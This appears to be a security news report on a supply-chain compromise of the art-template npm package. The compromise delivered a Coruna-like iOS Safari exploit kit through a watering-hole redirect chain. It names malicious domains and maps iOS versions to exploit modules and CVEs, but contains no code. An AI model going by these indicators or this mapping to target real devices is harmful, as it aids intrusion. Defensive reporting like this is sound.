Compromised art-template npm Package Delivers Coruna-Like iOS Exploit
Published
Key Takeaways
- Supply Chain Attack: Compromised art-template package versions injected malicious loaders into web environments.
- Exploit Kit Delivery: The payload targets iOS Safari users via sophisticated watering-hole tactics.
- Malicious Domain Routing: The campaign utilizes domains like v3.jiathis.com to deliver the framework.
A highly sophisticated package compromise involving art-template, a widely utilized JavaScript templating library originally authored by a developer known as aui, exposed a critical supply chain attack that delivered a Coruna-like iOS Safari exploit framework through a watering-hole attack.
Socket Threat Research detected the compromise on May 20, 2026. The threat actor systematically escalated the attack across multiple iterations of the open-source library.
Malicious Injection Mechanics
In version 4.13.3, the attackers utilized String.fromCharCode obfuscation to conceal the malicious payload. However, in subsequent versions 4.13.5 and 4.13.6, the attackers abandoned this obfuscation entirely. They opted instead for plaintext loadScript calls that injected a browser-side remote-script loader directly into the lib/template-web.js file.
This targeted injection initiated a precise redirect chain utilizing the domains v3.jiathis.com and utaq.cfww.shop, ultimately connecting victims to a command-and-control server hosted at l1ewsu3yjkqeroy[.]xyz.
The resulting implant functions as a highly specialized exploit delivery mechanism. It exclusively targets users running Safari on iOS versions 11.0 through iOS 17.2. The malicious framework explicitly rejects all other operating systems, desktop environments, and alternative browsers, and alternative browsers, according to Socket.
Furthermore, the framework implements a hard cutoff that immediately terminates execution on iOS 17.3 and above, preventing deployment on patched systems.
Vulnerable iOS devices targeted:
- iOS 11.0 – 15.1 — mmrZ0r flag path
- iOS 15.2 – 15.5 — RbKS6p flag path
- iOS 15.6 – 16.1 — ShQCsB flag path
- iOS 16.2 – 16.5 — KeCRDQ flag path
- iOS 16.6 – 17.1 — JtEUci flag path
- iOS 17.2 — JtEUci + wC3yaB; hardened WASM-verified path
- macOS Safari — partial; desktop WebKit path exists, fingerprinting differs
Coruna-Like iOS Safari Exploitation
Following their extensive technical analysis, Socket assessed with high confidence that this malicious sample represents the established Coruna exploit kit delivery framework or a very close derivative. The latter contains 5 full exploit chains and 23 individual exploits, targeting iOS 13.0 through 17.2.1.
“Coruna defines five WebContent RCE exploit chains, each covering a specific iOS version band,” the report said. The sample's five version-specific payload modules map to these chains with near-perfect alignment:
- iOS 11.0–15.1 (mmrZ0r) — Coruna buffout (CVE-2021-30952, fixed 15.2) and jacurutu (CVE-2022-48503, fixed 15.6)
- iOS 15.6–16.1 (ShQCsB) — Coruna bluebird (no CVE, fixed 16.2)
- iOS 16.2–16.5 (KeCRDQ) — Coruna terrorbird (CVE-2023-43000, fixed 16.6)
- iOS 16.6–17.2 (JtEUci) — Coruna cassowary (CVE-2024-23222, fixed 17.3)
- iOS 17.3+ — hard exit 1001 in our sample; cassowary patched at exactly this boundary
In March, U.S. contractor Trenchant, the offensive cyber operations division of U.S. defense contractor L3Harris, was linked to the global iPhone hacking toolkit Coruna, which GTIG estimated is currently used by multiple, unrelated threat actors.
Later the same month, a newer version of the DarkSword iPhone exploit kit leaked on GitHub, exposing iOS users to spyware.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular